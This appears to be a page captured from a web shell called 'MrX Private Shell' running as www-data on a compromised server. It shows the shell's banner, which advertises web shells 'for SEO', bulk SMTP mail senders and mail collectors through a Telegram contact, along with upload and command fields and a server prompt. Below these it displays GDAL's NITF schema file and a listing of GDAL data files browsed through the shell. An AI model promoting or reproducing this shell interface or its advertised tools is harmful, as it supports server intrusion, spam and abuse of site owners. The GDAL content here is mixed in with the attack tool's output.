__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.148: ~ $
<?xml version="1.0"?>
<!--
/******************************************************************************
 * $Id$
 *
 * Project:  NITF Library
 * Purpose:  Schema of description of NITF TREs
 * Author:   Even Rouault, <even dot rouault at spatialys.com>
 *
 **********************************************************************
 * Copyright (c) 2011, Even Rouault
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included
 * in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
 * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS IN THE SOFTWARE.
 ****************************************************************************/
-->
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
    <xs:element name="root">
        <xs:complexType>
            <xs:sequence>
                <xs:element name="tres" minOccurs="0">
                    <xs:complexType>
                        <xs:sequence>
                            <xs:element name="tre" type="treType" minOccurs="0" maxOccurs="unbounded"/>
                        </xs:sequence>
                    </xs:complexType>
                </xs:element>
                <xs:element name="des_list" minOccurs="0">
                    <xs:complexType>
                        <xs:sequence>
                            <xs:element name="des" type="desType" minOccurs="0" maxOccurs="unbounded"/>
                        </xs:sequence>
                    </xs:complexType>
                </xs:element>
            </xs:sequence>
        </xs:complexType>
    </xs:element>

    <xs:complexType name="treType">
        <xs:group ref="itemType"/>
        <xs:attribute name="name" type="xs:string"/>
        <xs:attribute name="md_prefix" type="xs:string" use="optional"/>
        <xs:attribute name="length" type="positiveInteger" use="optional"/>
        <xs:attribute name="minlength" type="xs:integer" use="optional"/>
        <xs:attribute name="maxlength" type="xs:integer" use="optional"/>
        <xs:attribute name="location" type="xs:string" use="optional"/>
    </xs:complexType>

    <xs:complexType name="desType">
        <xs:sequence>
            <!-- definition of user-defined subheader fields of DES -->
            <xs:element name="subheader_fields" minOccurs="0">
                <xs:complexType>
                    <xs:group ref="itemType"/>
                    <xs:attribute name="name" type="xs:string"/>
                    <xs:attribute name="length" type="positiveInteger" use="optional"/>
                    <xs:attribute name="minlength" type="xs:integer" use="optional"/>
                    <xs:attribute name="maxlength" type="xs:integer" use="optional"/>
                </xs:complexType>
            </xs:element>
        </xs:sequence>
        <xs:attribute name="name" type="xs:string"/>
    </xs:complexType>

    <xs:group name="itemType">
        <xs:sequence>
            <xs:choice minOccurs="0" maxOccurs="unbounded">
                <xs:element name="field" type="fieldType">
                    <xs:key name="att1">
                        <xs:selector xpath="."/>
                        <xs:field xpath="@length|@length_var"/>
                    </xs:key>
                </xs:element>
                <xs:element name="loop" type="loopType">
                    <xs:key name="att2">
                        <xs:selector xpath="."/>
                        <xs:field xpath="@counter|@iterations|@formula"/>
                    </xs:key>
                </xs:element>
                <xs:element name="if" type="ifType"/>
            </xs:choice>
            <xs:element name="if_remaining_bytes" type="if_remaining_bytesType" minOccurs="0" maxOccurs="1"/>
        </xs:sequence>
    </xs:group>

    <xs:complexType name="loopType">
        <xs:group ref="itemType"/>
        <xs:attribute name="name"/>
        <!-- xs:choice -->
            <xs:attribute name="counter" type="xs:string"/>
            <xs:attribute name="iterations" type="positiveInteger"/>
            <xs:attribute name="formula">
                <xs:simpleType>
                    <xs:restriction base="xs:string">
                        <xs:enumeration value="(NPART+1)*(NPART)/2"/>
                        <xs:enumeration value="(NUMOPG+1)*(NUMOPG)/2"/>
                        <xs:enumeration value="NPAR*NPARO"/>
                        <xs:enumeration value="NPLN-1"/>
                        <xs:enumeration value="NXPTS*NYPTS"/>
                    </xs:restriction>
                </xs:simpleType>
            </xs:attribute>
        <!-- /xs:choice -->
        <xs:attribute name="md_prefix" use="optional">
            <xs:simpleType>
                <xs:restriction base="xs:string">
                    <xs:pattern value="([a-z]|[A-Z]|[0-9]|_)*(%[0-9]*d)?([a-z]|[A-Z]|[0-9]|_)*"/>
                </xs:restriction>
            </xs:simpleType>
        </xs:attribute>
    </xs:complexType>

    <xs:simpleType name="positiveInteger">
        <xs:restriction base="xs:integer">
            <xs:minInclusive value="1"/>
        </xs:restriction>
    </xs:simpleType>

    <xs:complexType name="ifType">
        <xs:group ref="itemType"/>
        <xs:attribute name="cond">
            <xs:simpleType>
                <xs:restriction base="xs:string">
                    <xs:pattern value=".+([!]?=|:).*"/>
                </xs:restriction>
            </xs:simpleType>
        </xs:attribute>
    </xs:complexType>

    <xs:complexType name="if_remaining_bytesType">
        <xs:group ref="itemType"/>
    </xs:complexType>

    <xs:complexType name="fieldType">
        <!-- xs:choice -->
            <xs:attribute name="length" type="positiveInteger"/>
            <xs:attribute name="length_var" type="xs:string"/>
        <!-- /xs:choice -->
        <xs:attribute name="name" type="xs:string" use="optional"/>
        <xs:attribute name="longname" type="xs:string" use="optional"/>
        <xs:attribute name="type" use="optional">
            <xs:simpleType>
                <xs:restriction base="xs:string">
                    <xs:enumeration value="string"/>
                    <xs:enumeration value="integer"/>
                    <xs:enumeration value="real"/>
                    <xs:enumeration value="IEEE754_Float32_BigEndian"/>
                    <xs:enumeration value="UnsignedInt_BigEndian"/>
                    <xs:enumeration value="ISO8859-1"/>
                    <xs:enumeration value="bitmask"/>
                </xs:restriction>
            </xs:simpleType>
        </xs:attribute>
        <xs:attribute name="unit" type="xs:string" use="optional"/>
        <xs:attribute name="minval" use="optional"/>
        <xs:attribute name="maxval" use="optional"/>
        <xs:attribute name="fixed_value" use="optional"/>
        <!--<xs:anyAttribute/>-->
    </xs:complexType>
</xs:schema>

Filemanager

Name Type Size Permission Actions
GDALLogoBW.svg File 12.72 KB 0644
GDALLogoColor.svg File 12.02 KB 0644
GDALLogoGS.svg File 12.02 KB 0644
bag_template.xml File 8.81 KB 0644
default.rsc File 452.77 KB 0644
eedaconf.json File 411 B 0644
epsg.wkt File 27 B 0644
esri_StatePlane_extra.wkt File 324.75 KB 0644
gdalicon.png File 1.97 KB 0644
gdalmdiminfo_output.schema.json File 6.39 KB 0644
gdalvrt.xsd File 26.92 KB 0644
gml_registry.xml File 6.49 KB 0644
gmlasconf.xml File 7.26 KB 0644
gmlasconf.xsd File 47.51 KB 0644
grib2_center.csv File 4.07 KB 0644
grib2_process.csv File 4.81 KB 0644
grib2_subcenter.csv File 2.27 KB 0644
grib2_table_4_2_0_0.csv File 10.12 KB 0644
grib2_table_4_2_0_1.csv File 15.37 KB 0644
grib2_table_4_2_0_13.csv File 9.37 KB 0644
grib2_table_4_2_0_14.csv File 9.33 KB 0644
grib2_table_4_2_0_15.csv File 9.62 KB 0644
grib2_table_4_2_0_16.csv File 9.44 KB 0644
grib2_table_4_2_0_17.csv File 856 B 0644
grib2_table_4_2_0_18.csv File 9.98 KB 0644
grib2_table_4_2_0_19.csv File 11.6 KB 0644
grib2_table_4_2_0_190.csv File 9.28 KB 0644
grib2_table_4_2_0_191.csv File 9.39 KB 0644
grib2_table_4_2_0_2.csv File 10.55 KB 0644
grib2_table_4_2_0_20.csv File 11.84 KB 0644
grib2_table_4_2_0_3.csv File 10.09 KB 0644
grib2_table_4_2_0_4.csv File 10.07 KB 0644
grib2_table_4_2_0_5.csv File 9.6 KB 0644
grib2_table_4_2_0_6.csv File 11.37 KB 0644
grib2_table_4_2_0_7.csv File 10.25 KB 0644
grib2_table_4_2_10_0.csv File 11.5 KB 0644
grib2_table_4_2_10_1.csv File 9.37 KB 0644
grib2_table_4_2_10_191.csv File 9.41 KB 0644
grib2_table_4_2_10_2.csv File 9.65 KB 0644
grib2_table_4_2_10_3.csv File 9.55 KB 0644
grib2_table_4_2_10_4.csv File 9.95 KB 0644
grib2_table_4_2_1_0.csv File 9.9 KB 0644
grib2_table_4_2_1_1.csv File 9.43 KB 0644
grib2_table_4_2_1_2.csv File 9.57 KB 0644
grib2_table_4_2_20_0.csv File 9.32 KB 0644
grib2_table_4_2_20_1.csv File 9.62 KB 0644
grib2_table_4_2_20_2.csv File 9.28 KB 0644
grib2_table_4_2_2_0.csv File 11.92 KB 0644
grib2_table_4_2_2_3.csv File 10.38 KB 0644
grib2_table_4_2_2_4.csv File 10.96 KB 0644
grib2_table_4_2_2_5.csv File 9.29 KB 0644
grib2_table_4_2_3_0.csv File 10.69 KB 0644
grib2_table_4_2_3_1.csv File 10.41 KB 0644
grib2_table_4_2_3_2.csv File 3.74 KB 0644
grib2_table_4_2_3_3.csv File 784 B 0644
grib2_table_4_2_3_4.csv File 1.03 KB 0644
grib2_table_4_2_3_5.csv File 920 B 0644
grib2_table_4_2_3_6.csv File 819 B 0644
grib2_table_4_2_4_0.csv File 9.33 KB 0644
grib2_table_4_2_4_1.csv File 9.46 KB 0644
grib2_table_4_2_4_10.csv File 9.47 KB 0644
grib2_table_4_2_4_2.csv File 9.43 KB 0644
grib2_table_4_2_4_3.csv File 9.49 KB 0644
grib2_table_4_2_4_4.csv File 9.46 KB 0644
grib2_table_4_2_4_5.csv File 9.27 KB 0644
grib2_table_4_2_4_6.csv File 9.41 KB 0644
grib2_table_4_2_4_7.csv File 9.33 KB 0644
grib2_table_4_2_4_8.csv File 9.46 KB 0644
grib2_table_4_2_4_9.csv File 9.31 KB 0644
grib2_table_4_2_local_Canada.csv File 333 B 0644
grib2_table_4_2_local_HPC.csv File 87 B 0644
grib2_table_4_2_local_MRMS.csv File 15.22 KB 0644
grib2_table_4_2_local_NCEP.csv File 27.32 KB 0644
grib2_table_4_2_local_NDFD.csv File 2.6 KB 0644
grib2_table_4_2_local_index.csv File 251 B 0644
grib2_table_4_5.csv File 9.78 KB 0644
grib2_table_versions.csv File 40 B 0644
gt_datum.csv File 15.43 KB 0644
gt_ellips.csv File 1.68 KB 0644
header.dxf File 6.42 KB 0644
inspire_cp_BasicPropertyUnit.gfs File 1.7 KB 0644
inspire_cp_CadastralBoundary.gfs File 1.61 KB 0644
inspire_cp_CadastralParcel.gfs File 2.39 KB 0644
inspire_cp_CadastralZoning.gfs File 4.7 KB 0644
jpfgdgml_AdmArea.gfs File 1.6 KB 0644
jpfgdgml_AdmBdry.gfs File 1.35 KB 0644
jpfgdgml_AdmPt.gfs File 1.59 KB 0644
jpfgdgml_BldA.gfs File 1.47 KB 0644
jpfgdgml_BldL.gfs File 1.47 KB 0644
jpfgdgml_Cntr.gfs File 1.47 KB 0644
jpfgdgml_CommBdry.gfs File 1.35 KB 0644
jpfgdgml_CommPt.gfs File 1.6 KB 0644
jpfgdgml_Cstline.gfs File 1.47 KB 0644
jpfgdgml_ElevPt.gfs File 1.46 KB 0644
jpfgdgml_GCP.gfs File 2.46 KB 0644
jpfgdgml_LeveeEdge.gfs File 1.35 KB 0644
jpfgdgml_RailCL.gfs File 1.47 KB 0644
jpfgdgml_RdASL.gfs File 1.22 KB 0644
jpfgdgml_RdArea.gfs File 1.48 KB 0644
jpfgdgml_RdCompt.gfs File 1.61 KB 0644
jpfgdgml_RdEdg.gfs File 1.6 KB 0644
jpfgdgml_RdMgtBdry.gfs File 1.35 KB 0644
jpfgdgml_RdSgmtA.gfs File 1.61 KB 0644
jpfgdgml_RvrMgtBdry.gfs File 1.36 KB 0644
jpfgdgml_SBAPt.gfs File 1.34 KB 0644
jpfgdgml_SBArea.gfs File 1.47 KB 0644
jpfgdgml_SBBdry.gfs File 1.22 KB 0644
jpfgdgml_WA.gfs File 1.46 KB 0644
jpfgdgml_WL.gfs File 1.46 KB 0644
jpfgdgml_WStrA.gfs File 1.47 KB 0644
jpfgdgml_WStrL.gfs File 1.47 KB 0644
netcdf_config.xsd File 7.32 KB 0644
nitf_spec.xml File 145.37 KB 0644
nitf_spec.xsd File 7.51 KB 0644
ogrvrt.xsd File 25.15 KB 0644
osmconf.ini File 5.07 KB 0644
ozi_datum.csv File 8.28 KB 0644
ozi_ellips.csv File 1.32 KB 0644
pci_datum.txt File 34.28 KB 0644
pci_ellips.txt File 3.38 KB 0644
pdfcomposition.xsd File 33.53 KB 0644
pds4_template.xml File 3.35 KB 0644
plscenesconf.json File 40.4 KB 0644
ruian_vf_ob_v1.gfs File 45.68 KB 0644
ruian_vf_st_uvoh_v1.gfs File 2.54 KB 0644
ruian_vf_st_v1.gfs File 44.89 KB 0644
ruian_vf_v1.gfs File 65.76 KB 0644
s57agencies.csv File 12.99 KB 0644
s57attributes.csv File 19.53 KB 0644
s57expectedinput.csv File 20.4 KB 0644
s57objectclasses.csv File 52.08 KB 0644
seed_2d.dgn File 9 KB 0644
seed_3d.dgn File 2 KB 0644
stateplane.csv File 10.12 KB 0644
template_tiles.mapml File 1.9 KB 0644
tms_LINZAntarticaMapTileGrid.json File 4.02 KB 0644
tms_MapML_APSTILE.json File 6.13 KB 0644
tms_MapML_CBMTILE.json File 7.61 KB 0644
tms_NZTM2000.json File 5.14 KB 0644
trailer.dxf File 2.22 KB 0644
vdv452.xml File 25.21 KB 0644
vdv452.xsd File 2.79 KB 0644
vicar.json File 3.53 KB 0644
Filemanager